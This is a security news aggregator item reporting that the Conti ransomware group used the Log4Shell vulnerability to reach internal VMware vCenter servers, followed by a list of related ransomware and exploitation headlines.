Security News > 2021 > December > Conti ransomware uses Log4j bug to hack VMware vCenter servers
Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.
Among the first to leverage the bug were cryptocurrency miners, botnets, and a new ransomware strain called Khonsari.
While most defenders are focused on blocking Log4Shell attacks on Internet-exposed devices, the Conti ransomware operation shows how the vulnerability can be used to target internal devices that may not receive as much attention.
The researchers confirmed that Conti ransomware affiliates had already compromised the target networks and exploited vulnerable Log4j machines to gain access to vCenter servers.
Conti is a Russian-speaking group that has been in the ransomware game for a long time, being the successor of the infamous Ryuk.
Recently, the Australian Cyber Security Centre published an alert about Conti ransomware targeting multiple organizations in the country.
News URL
Related news
- Hitachi Vantara takes servers offline after Akira ransomware attack (source)
- Critical Langflow RCE flaw exploited to hack AI app servers (source)
- Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers (source)
- Police takes down 300 servers in ransomware supply-chain crackdown (source)
- 300 Servers and €3.5M Seized as Europol Strikes Ransomware Networks Worldwide (source)